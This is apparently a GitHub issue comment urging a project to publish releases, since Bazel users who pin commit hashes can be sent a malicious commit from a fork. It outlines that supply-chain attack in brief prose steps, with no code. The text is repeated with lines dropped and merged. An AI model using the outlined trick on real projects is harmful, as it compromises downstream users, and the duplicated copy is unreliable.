Releases are a good idea for a bunch of reasons
one of those reasons is that without it, using bazel, downstreams pin to commit hashes
the way that github works is that if you use a commit hash it could be a commit hash from anywhere, which makes it easy to:
- create a fork of the repo
- make malicious changes
- propose a "rolling" update in downstreams using your commit hash
you dont need to open a pr - so there is no way here of telling someone has done that, and so it relies on downstreams checking that the hash is really an ancestor of main
this can be easily avoided by adding releases
Releases are a good idea for a bunch of reasons
one of those reasons is that without it, using bazel, downstreams pin to commit hashes
the way that github works is that if you use a commit hash it could be a commit hash from anywhere, which makes it easy to:
you dont need to open a pr - so there is no way here of telling someone has done that, and so it relies on downstreams checking that the hash is really an ancestor of
mainthis can be easily avoided by adding releases